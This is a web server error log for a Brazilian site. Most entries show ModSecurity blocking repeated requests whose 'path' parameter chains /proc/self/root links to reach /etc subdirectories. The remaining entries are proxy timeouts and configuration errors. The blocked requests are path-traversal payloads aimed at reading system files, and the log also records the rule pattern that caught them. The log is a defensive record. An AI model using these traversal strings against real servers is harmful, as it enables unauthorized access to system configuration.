[Tue Mar 17 18:06:59.121847 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.128:44896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCc6BJNF7axNlVR0UvXwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Tue Mar 17 18:07:02.020871 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:34674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCdMU6Sx0TG1YjmQjFWAAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:04.249875 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:59248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCeNa6ubjKNq_cu4YekgAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:07:04.970466 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:55132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCeNa6ubjKNq_cu4YekwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:06.707644 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.241.31:55142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCegeiSKl8TjouI-YuggAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:09.567485 2026] [mime_magic:error] [pid 31803:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:48334] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/opt
[Tue Mar 17 18:07:09.567799 2026] [access_compat:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:48334] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/opt
[Tue Mar 17 18:07:11.269416 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:48340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCf-yqAr6etmhZHNo-XgAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:11.808603 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:59252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCf9a6ubjKNq_cu4YemQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:12.745688 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:48348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCgOyqAr6etmhZHNo-YQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:14.808765 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:39534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCguyqAr6etmhZHNo-ZwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:07:15.491402 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:48362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCg-yqAr6etmhZHNo-aAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:17.258941 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.241.31:41806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnChQeiSKl8TjouI-YuhAAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:19.109884 2026] [proxy_fcgi:error] [pid 25836:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38254] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:07:23.896005 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.241.31:41814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCi3Ik7brgkOH-rIWjaQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:07:25.594383 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.241.31:41820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCjYh-PF_25v4hFRCBmgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:07:38.410463 2026] [core:alert] [pid 2598:tid 140411716749056] [client 74.7.241.31:41832] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/lib
[Tue Mar 17 18:07:41.119886 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38702] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:08:04.121897 2026] [proxy_fcgi:error] [pid 19507:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38998] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:08:07.890430 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:39550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnCt9Y0UrI5A3LftIwUmAAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:08:27.134630 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39350] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:08:37.484395 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:55698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnC1dY0UrI5A3LftIwUuQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:08:44.295603 2026] [:error] [pid 7004:tid 140411649607424] [client 74.7.241.31:49990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnC3MU6Sx0TG1YjmQjFcgAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:08:44.824336 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:50624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnC3Na6ubjKNq_cu4YevQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:08:45.324423 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:50624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnC3da6ubjKNq_cu4YevgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:08:47.042394 2026] [:error] [pid 29151:tid 140411548894976] [client 74.7.243.128:34274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnC3_PqhzTj3BvfDX-eaQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:08:49.133839 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:09:02.927398 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.241.31:49990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnC7sU6Sx0TG1YjmQjFgwAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
